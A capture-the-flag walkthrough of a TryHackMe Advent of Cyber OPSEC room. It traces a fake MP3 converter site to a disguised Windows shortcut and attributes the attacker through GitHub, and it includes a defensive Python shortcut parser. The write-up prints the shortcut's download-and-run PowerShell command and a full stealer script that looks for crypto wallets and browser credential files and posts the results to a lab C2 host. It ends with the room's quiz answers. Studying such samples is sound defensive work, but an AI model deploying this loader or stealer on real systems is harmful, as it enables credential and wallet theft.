#AdventOfCyber Day 1 - OPSEC | TryHackMe

Maybe SOC-mas music, he thought, doesn't come from a store?

The Story

McSkidy tapped keys with a confident grin,

A suspicious website, now where to begin?

She'd seen sites like this, full of code and of grime,

Shady domains, and breadcrumbs easy to find.

McSkidy’s fingers hovered over the keyboard as she gazed at the suspicious website. She had seen countless malware campaigns in her time, but this one had a certain flair. The site looked innocent enough—a YouTube-to-MP3 converter—but her gut told her something was off. It was time to dig deeper.

Task Overview

The goal of this task was to investigate a seemingly harmless website, uncover hidden threats, and track down the mastermind behind it all. Along the way, we learned about operational security (OPSEC) mistakes, examined suspicious files, and followed digital breadcrumbs to their source.

Objectives

  1. Investigate malicious .lnk files.

  2. Analyze a suspicious PowerShell script.

  3. Understand and identify OPSEC mistakes.

  4. Attribute the malicious activity to its creator.

Connecting to the Machine

Banner showing connection options provided in this room.

To start the investigation, I launched the virtual machine (VM) provided by the challenge and accessed the AttackBox. After ensuring everything was loaded correctly, I opened the browser and navigated to the suspicious website using the provided MACHINE_IP address.

Examining the Website

At first glance, the website seemed ordinary. It boasted features like being “Secure” and “Safe,” but McSkidy and I knew better. A quick look at the About Page revealed the name “The Glitch,” which seemed like an intentional clue.

A screenshot of the website.

We decided to test the site’s functionality by pasting a YouTube link—the classic “Rick Roll” video—into the converter. After hitting “Convert” and choosing the MP3 option, the site prompted us to download a ZIP file named download.zip.

Extracting and Inspecting the Files

Unzipping download.zip revealed two files: song.mp3 and somg.mp3.

A screenshot presenting extraction of a zip archive.

At first glance, the filenames raised a red flag. While song.mp3 appeared normal, somg.mp3 seemed suspicious. To confirm our suspicions, we opened a terminal and used the file command to analyze both files.

Analyzing song.mp3

user@tryhackme:~$ file song.mp3
song.mp3: Audio file with ID3 version 2.3.0, contains:MPEG ADTS, layer III, v1, 192 kbps, 44.1 kHz, Stereo

This output confirmed that song.mp3 was a genuine audio file.

Analyzing somg.mp3

user@tryhackme:~$ file somg.mp3
somg.mp3: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Archive, ctime=Sat Sep 15 07:14:14 2018, mtime=Sat Sep 15 07:14:14 2018, atime=Sat Sep 15 07:14:14 2018, length=448000, window=hide

This output revealed that somg.mp3 was actually a Windows shortcut (.lnk file). Shortcuts can be weaponized to execute commands, making this file a potential threat.

Investigating the .lnk File

To uncover the hidden commands in somg.mp3, we used ExifTool, a powerful metadata analysis tool.

user@tryhackme:~$ exiftool somg.mp3

Key Findings: The output revealed a PowerShell command embedded within the shortcut:

Relative Path                   : ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command Line Arguments          : -ep Bypass -nop -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1','C:\ProgramData\s.ps1'); iex (Get-Content 'C:\ProgramData\s.ps1' -Raw)"
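The fields ExifTool printed above live in the StringData section of the Windows Shell Link format. The following is an added example, not code from the room or from TryHackMe: it reads those fields straight from the binary layout (header, then optional ID list and LinkInfo, then the strings) and applies a small defender-side triage to them. The shortcut it parses is constructed inside the block to mirror somg.mp3, and decoding non-Unicode strings as cp1252 is an assumption.

```python
import struct
# LinkFlags bits from the MS-SHLLINK specification (ShellLinkHeader)
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-46}

def _read_string(data, off, unicode):
    """StringData item: uint16 char count, then the chars; cp1252 for ANSI is an assumption."""
    n = struct.unpack_from("<H", data, off)[0]
    raw = data[off + 2:off + 2 + (n * 2 if unicode else n)]
    return raw.decode("utf-16-le" if unicode else "cp1252"), off + 2 + len(raw)

def parse_lnk(data):
    """Return ShowCommand and the StringData fields of a Shell Link, or raise ValueError."""
    size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Windows shortcut")
    info = {"show_command": struct.unpack_from("<I", data, 0x3C)[0]}
    off = 0x4C                                     # header is always 76 bytes
    if flags & HAS_ID_LIST:                        # skip LinkTargetIDList (uint16 size + list)
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                      # skip LinkInfo (uint32 size includes itself)
        off += struct.unpack_from("<I", data, off)[0]
    for bit, key in ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                     (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                     (HAS_ICON, "icon_location")):
        if flags & bit:
            info[key], off = _read_string(data, off, bool(flags & IS_UNICODE))
    return info

def triage(info):
    """Defender-side indicators for a shortcut that is really a script launcher."""
    target = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    hits = [s for s in ("powershell", "-ep bypass", "-nop", "iex", "downloadfile") if s in target]
    if info["show_command"] != 1:                  # 1 = SW_SHOWNORMAL; anything else hides the window
        hits.append("non-normal ShowCommand")
    return hits

def _string(s):
    return struct.pack("<H", len(s)) + s.encode("utf-16-le")

def build_sample_lnk():
    """Constructed sample modelled on somg.mp3: Unicode strings, ARCHIVE attribute, ShowCommand 7."""
    flags = HAS_REL_PATH | HAS_WORK_DIR | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 448000, 0, 7, 0, 0, 0, 0)
    return (header + _string(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe")
            + _string(r"C:\Windows\System32")
            + _string("-ep Bypass -nop -c \"iex (Get-Content 'C:\\ProgramData\\s.ps1' -Raw)\""))
```

Running parse_lnk on the real somg.mp3 bytes gives the same Relative Path and Command Line Arguments ExifTool showed; triage then lists the launcher indicators an analyst would escalate on.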

What this PowerShell command does:

This command downloaded a PowerShell script (IS.ps1) to C:\ProgramData\s.ps1 and executed it with iex (Invoke-Expression); -ep Bypass disables the execution policy and -nop skips loading the user profile. The URL told us where the script was staged, and the script itself pointed to the Command and Control (C2) server that receives the stolen data:

https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1

Contents of IS.ps1 as served from that URL:

function Print-AsciiArt {
    Write-Host "  ____     _       ___  _____    ___    _   _ "
    Write-Host " / ___|   | |     |_ _||_   _|  / __|  | | | |"  
    Write-Host "| |  _    | |      | |   | |   | |     | |_| |"
    Write-Host "| |_| |   | |___   | |   | |   | |__   |  _  |"
    Write-Host " \____|   |_____| |___|  |_|    \___|  |_| |_|"

    Write-Host "         Created by the one and only M.M."
}

# Call the function to print the ASCII art
Print-AsciiArt

# Path for the info file
$infoFilePath = "stolen_info.txt"

# Function to search for wallet files
function Search-ForWallets {
    $walletPaths = @(
        "$env:USERPROFILE\.bitcoin\wallet.dat",
        "$env:USERPROFILE\.ethereum\keystore\*",
        "$env:USERPROFILE\.monero\wallet",
        "$env:USERPROFILE\.dogecoin\wallet.dat"
    )
    Add-Content -Path $infoFilePath -Value "`n### Crypto Wallet Files ###"
    foreach ($path in $walletPaths) {
        if (Test-Path $path) {
            Add-Content -Path $infoFilePath -Value "Found wallet: $path"
        }
    }
}

# Function to search for browser credential files (SQLite databases)
function Search-ForBrowserCredentials {
    $chromePath = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Login Data"
    $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\logins.json"

    Add-Content -Path $infoFilePath -Value "`n### Browser Credential Files ###"
    if (Test-Path $chromePath) {
        Add-Content -Path $infoFilePath -Value "Found Chrome credentials: $chromePath"
    }
    if (Test-Path $firefoxPath) {
        Add-Content -Path $infoFilePath -Value "Found Firefox credentials: $firefoxPath"
    }
}

# Function to send the stolen info to a C2 server
function Send-InfoToC2Server {
    $c2Url = "http://papash3ll.thm/data"
    $data = Get-Content -Path $infoFilePath -Raw

    # Using Invoke-WebRequest to send data to the C2 server
    Invoke-WebRequest -Uri $c2Url -Method Post -Body $data
}

# Main execution flow
Search-ForWallets
Search-ForBrowserCredentials
Send-InfoToC2Server

Analyzing the PowerShell Script

Visiting the URL in a browser revealed the contents of IS.ps1. The script was designed to:

  1. Search for cryptocurrency wallet files.

  2. Steal browser credentials.

  3. Exfiltrate the stolen data to a remote server.

The script even included a signature:

Created by the one and only M.M.

This distinctive string gave us a vital clue about the attacker’s identity.

Tracking the Attacker

Using the signature “Created by the one and only M.M.,” we conducted a GitHub search. This led us to several repositories and an Issues page where the attacker, M.M., had left comments. One particular comment linked their activity to the malware.

GitHub Search Query:

"Created by the one and only M.M."

Exploring the repositories, we discovered:

  • The attacker’s username: MM-WarevilleTHM

  • The number of commits on the repo: 1

Understanding OPSEC Mistakes

M.M. made several OPSEC errors, including:

  1. Leaving a signature in the PowerShell script.

  2. Using a GitHub account that tied directly to the malicious activity.

  3. Engaging publicly in GitHub discussions, leaving timestamps and other clues.

These mistakes allowed us to trace the attack back to its source and identify the mastermind behind it.

Introduction to OPSEC

This is a classic case of OPSEC failure.

Operational Security (OPSEC) is a term originally coined in the military to refer to the process of protecting sensitive information and operations from adversaries. The goal is to identify and eliminate potential vulnerabilities before the attacker can learn their identity.

In the context of cyber security, when malicious actors fail to follow proper OPSEC practices, they might leave digital traces that can be pieced together to reveal their identity. Some common OPSEC mistakes include:

  • Reusing usernames, email addresses, or account handles across multiple platforms. One might assume that anyone trying to cover their tracks would remove such obvious and incriminating information, but sometimes, it's due to vanity or simply forgetfulness.

  • Using identifiable metadata in code, documents, or images, which may reveal personal information like device names, GPS coordinates, or timestamps.

  • Posting publicly on forums or GitHub (as in this scenario) with details that tie back to their real identity or reveal their location or habits.

  • Failing to use a VPN or proxy while conducting malicious activities, which allows law enforcement to track their real IP address.

You'd think that someone doing something bad would make OPSEC their top priority, but they're only human and can make mistakes, too.

For example, here are some real-world OPSEC mistakes that led to some really big fails:

AlphaBay Admin Takedown

One of the most spectacular OPSEC failures involved Alexandre Cazes, the administrator of AlphaBay, one of the largest dark web marketplaces:

  • Cazes used the email address "pimp_alex_91@hotmail.com" in early welcome emails from the site.

  • This email included his year of birth and other identifying information.

  • He cashed out using a Bitcoin account tied to his real name.

  • Cazes reused the username "Alpha02" across multiple platforms, linking his dark web identity to forum posts under his real name.

Chinese Military Hacking Group (APT1)

There's also the notorious Chinese hacking group APT1, which made several OPSEC blunders:

  • One member, Wang Dong, signed his malware code with the nickname "Ugly Gorilla".

  • This nickname was linked to programming forum posts associated with his real name.

  • The group used predictable naming conventions for users, code, and passwords.

  • Their activity consistently aligned with Beijing business hours, making their location obvious.

These failures provided enough information for cyber security researchers and law enforcement to publicly identify group members.

Uncovering MM

If you've thoroughly investigated the GitHub search result, you should have uncovered several clues based on poor OPSEC practices by the malicious actor.

We know the attacker left a distinctive signature in the PowerShell code (MM). This allowed us to search for related repositories and issues pages on GitHub. We then discovered an Issues page where the attacker engaged in discussions, providing more context and linking their activity to other projects.

Illustration of a mansion with footsteps leading to it.

In this discussion, they responded to a query about modifying the code. This response, paired with their unique handle, was another critical slip-up, leaving behind a trail of evidence that can be traced back to them. By analysing the timestamps, usernames, and the nature of their interactions, we can now attribute the mastermind behind the attack to MM.


Question Solutions

  1. Looks like the song.mp3 file is not what we expected! Run "exiftool song.mp3" in your terminal to find out the author of the song. Who is the author? Rick Astley

  2. The malicious PowerShell script sends stolen info to a C2 server. What is the URL of this C2 server? C2 Server URL: http://papash3ll.thm/data

  3. Who is M.M? Maybe his Github profile page would provide clues? The attacker’s GitHub username is MM-WarevilleTHM.

  4. What is the number of commits on the GitHub repo where the issue was raised? 1


McSkidy leaned back in her chair, satisfied with the day’s work. The trail didn’t end here, but she had uncovered enough to disrupt M.M.’s plans. “Glitch might have been a distraction,” she thought. “But M.M. made this personal.”